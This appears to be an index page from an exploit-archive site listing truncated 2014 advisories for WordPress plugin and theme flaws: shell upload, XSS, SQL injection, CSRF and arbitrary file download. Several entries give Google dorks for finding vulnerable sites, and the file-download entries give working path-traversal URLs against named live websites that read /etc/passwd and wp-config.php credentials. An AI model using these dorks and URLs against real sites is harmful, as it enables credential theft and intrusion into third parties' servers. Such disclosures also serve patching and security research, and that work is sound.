WordPress Slideshow Gallery 1.4.6 Shell Upload

16 September 2014 - Source: http://www.mondounix.com
#!/usr/bin/env python
#
# WordPress Slideshow Gallery 1.4.6 Shell Upload Exploit
#
# WordPress Slideshow Gallery plugin version 1.4.6 suffers from a remote shell upload vulnerability (CVE-2014-5460)
#
# Vulnerability discovered by: Jesus Ramirez Pichardo - http://whitexploit.blogspot.mx/
#
# Exploit written by: Claudio Viviani - info@homelab.it - http://www.homelab.it
#
#
# Disclaimer:
#
# This exploit is intended for educational purposes only and the author
# can not be held liable for any kind of damages done whatsoever to your machine,
# or damages caused by some other, creative application of this exploit.
# In any case you disagree with the above statement, stop here.
#
#
# Requirements:
#
# 1) Enabled user management...


WordPress Photo Album Plus 5.4.4 Cross Site Scripting

15 September 2014 - Source: http://www.mondounix.com
WP Photo Album Plus Security Vulnerabilities
 
Author: Milhouse 
Download: https://wordpress.org/plugins/wp-photo-album-plus/
Home Page: http://wppa.opajaap.nl/
Google dork: inurl:wp-content/plugins/wp-photo-album-plus
 
Set up:
Wordpress Version: 3.9.1, 3.9.2
WP Photo Album Plus version: 5.4.4, 5.4.3
Client browsers: FireFox 31, Internet Explorer 8-11
 
Issue number 1: A Cross-Site Scripting (reflective) vulnerability.
Details:
The plugin echoes the value of the HTTP header “User-Agent” back to the client browser, allowing un-sanitized JavaScript to be inserted.
 
Severity: Low
 
Proof of Concept (POC):
Request:
GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent:...


WordPress Plugin Vulnerability Dump – Part 2

10 September 2014 - Source: http://www.mondounix.com
More vulnerabilities in poorly coded plugins for y'all.
 
Ninja Forms v2.77 - Authorization bypass (regular users can delete forms, etc)
Contact Form v3.83 - Email header injection
WP to Twitter v2.9.3 - Authorization bypass (regular users can tweet to the admin's twitter account)
Xhanch - My Twitter v2.7.7 - CSRF (create and delete tweets)
TinyMCE Advanced v4.1 - (insignificant) CSRF
W3 Total Cache v0.9.4 - (minor) CSRF
WordPress Download Manager v2.6.92 - Authorization bypass (regular users can upload/delete arbitrary files, yes, even php files)
Wordfence Security v5.2.2 - Stored XSS
 
Details and POCs located: https://vexatioustendencies.com/wordpress-plugin-vulnerability-dump-part-2/
 
More to follow.
 
-Voxel...


WordPress Spider Facebook 1.0.8 SQL Injection

9 September 2014 - Source: http://www.mondounix.com
######################
# Exploit Title : Wordpress Spider Facebook 1.0.8 Authenticated SQL Injection
 
# Exploit Author : Claudio Viviani
 
# Vendor Homepage : http://web-dorado.com/
 
# Software Link : http://downloads.wordpress.org/plugin/spider-facebook.1.0.8.zip
 
# Date : 2014-08-25
 
# Tested on : Windows 7 / Mozilla Firefox
#             Linux / Mozilla Firefox
#             Linux / sqlmap 1.0-dev-5b2ded0
 
######################
 
# Location :  
http://localhost/wp-content/plugins/plugins/spider-facebook/facebook.php
 
######################
 
# Vulnerable code :
 
function Spider_Facebook_manage()
{
        require_once("facebook_manager.php");
        require_once("facbook_manager.html.php");
...


WordPress Like Dislike Counter 1.2.3 SQL Injection

9 September 2014 - Source: http://www.mondounix.com
#################################################################################################
#
# Title                : Wordpress Like Dislike Counter Plugin SQL Injection Vulnerability
# Risk                 : High+/Critical
# Exploit Author       : XroGuE
# Google Dork          : inurl:plugins/like-dislike-counter-for-posts-pages-and-comments/ajax_counter.php  AND  plugins/pro-like-dislike-counter/ldc-ajax-counter.php
# Plugin Version       : 1.2.3
# Plugin Name          : Like Dislike Counter
# Plugin Download Link : http://downloads.wordpress.org/plugin/like-dislike-counter-for-posts-pages-and-comments.zip
# Vendor Home          : www.wpfruits.com
# Date                 : 2014/09/05
# Tested in            : Win7 - Linux
#
##################################################################################################
#...


WordPress Bulk Delete Users By Email 1.0 CSRF

9 September 2014 - Source: http://www.mondounix.com
# Exploit Title: Bulk Delete Users by Email, Wordpress Plugin 1.0 - CSRF
# Google Dork: N/A
# Date: 05.09.2014
# Exploit Author: Fikri Fadzil - fikri.fadzil@impact-alliance.org
# Vendor Homepage - http://www.speakdigital.co.uk/
# Software Link: https://wordpress.org/plugins/bulk-delete-users-by-email/
# Version: 1.0
# Tested on: PHP
 
 
Description:
This plugin allows the administrator to delete user account(s) by entering
their email address.
 
Proof of Concept
1. Force the administrator to send the request below:
 
URL :
http://localhost/blog/wp-admin/admin.php?page=bulk-delete-users-by-email/plugin.php
METHOD : POST
REQUEST : de-text=<victim email>&submit=Search+and+Delete
 
* As the result,...


WordPress Urban City Arbitrary File Download

9 September 2014 - Source: http://www.mondounix.com
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
|-------------------------------------------------------------------------|
|[*] Exploit Title: Wordpress urban city Arbitrary File Download Vulnerability
|
|[*] Google Dork: inurl:wp-content/themes/urbancity
|
|[*] Date : 2014-09-07
|
|[*] Exploit Author: Ashiyane Digital Security Team
|
|[*] Vendor Homepage : https://churchthemes.net/themes/urban-city/
|
|[*] Tested on: Windows 7
|
|-------------------------------------------------------------------------|
|
|[*] Location :
[localhost]/wp-content/themes/urbancity/lib/scripts/download.php?file=/etc/passwd
|
|-------------------------------------------------------------------------|
|[*] Proof:
|
|[*]
http://www.nlbcministries.org/wp-content/themes/urbancity/lib/scripts/download.php?file=/etc/passwd
|
|[*]
www.colonialhills.com/wp-content/themes/urbancity/lib/scripts/download.php?file=/etc/passwd
|
|[*]
http://iccpaix.org/wpblog/wp-content/themes/urbancity/lib/scripts/download.php?file=/etc/passwd
|
|[*]
http://praisecovenant.net/wp-content/themes/urbancity/lib/scripts/download.php?file=/etc/passwd
|
|-------------------------------------------------------------------------|
|[*]...


WordPress Epic Arbitrary File Download

9 September 2014 - Source: http://www.mondounix.com
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
|-------------------------------------------------------------------------|
|[*] Exploit Title: Wordpress epic theme Arbitrary File Download Vulnerability
|
|[*] Google Dork: inurl:wp-content/themes/epic
|
|[*] Date : 2014-09-07
|
|[*] Exploit Author: Ashiyane Digital Security Team
|
|[*] Vendor Homepage : http://www.organizedthemes.com/epic
|
|[*] Tested on: Windows 7
|
|-------------------------------------------------------------------------|
|
|[*] Location :
[localhost]/wp-content/themes/epic/includes/download.php?file=/etc/passwd
|
|-------------------------------------------------------------------------|
|[*] Proof:
|
|[*]
http://www.lagunabaptist.org/wp-content/themes/epic/includes/download.php?file=/home/content/46/8992446/html/wp-config.php
|
|[*]
http://doveetown.org/wp-content/themes/epic/includes/download.php?file=/home/content/03/10398303/html/wp-config.php
|
|[*]
http://verdebaptist.com/wp/wp-content/themes/epic/includes/download.php?file=/home/content/44/2981244/html/wp/wp-config.php
|
|[*]
http://kespres.ca/wp-content/themes/epic/includes/download.php?file=/home/content/30/10806230/html/wp-config.php
|
|[*]
http://kimberlywilliamsministries.org/wp-content/themes/epic/includes/download.php?file=/home2/praise11/public_html/wp-config.php
|
|-------------------------------------------------------------------------|
|[*]...


WordPress Authentic Arbitrary File Download

9 September 2014 - Source: http://www.mondounix.com
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
|-------------------------------------------------------------------------|
|[*] Exploit Title: Wordpress Authentic Theme Arbitrary File Download Vulnerability
|
|[*] Google Dork: inurl:wp-content/themes/authentic
|
|[*] Date : 2014-09-07
|
|[*] Exploit Author: Ashiyane Digital Security Team
|
|[*] Vendor Homepage : http://www.organizedthemes.com/authentic-theme
|
|[*] Tested on: Windows 7
|
|-------------------------------------------------------------------------|
|
|[*] Location :
[localhost]/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php
|
|-------------------------------------------------------------------------|
|[*]...


WordPress Antioch Arbitrary File Download

9 September 2014 - Source: http://www.mondounix.com
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
|-------------------------------------------------------------------------|
|[*] Exploit Title: Wordpress Antioch Theme Arbitrary File Download Vulnerability
|
|[*] Google Dork: inurl:wp-content/themes/antioch
|
|[*] Date : 2014-09-07
|
|[*] Exploit Author: Ashiyane Digital Security Team
|
|[*] Vendor Homepage : http://churchthemes.net/themes/antioch
|
|[*] Tested on: Windows 7
|
|-------------------------------------------------------------------------|
|
|[*] Location :
[localhost]/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php
|
|-------------------------------------------------------------------------|
|[*]...
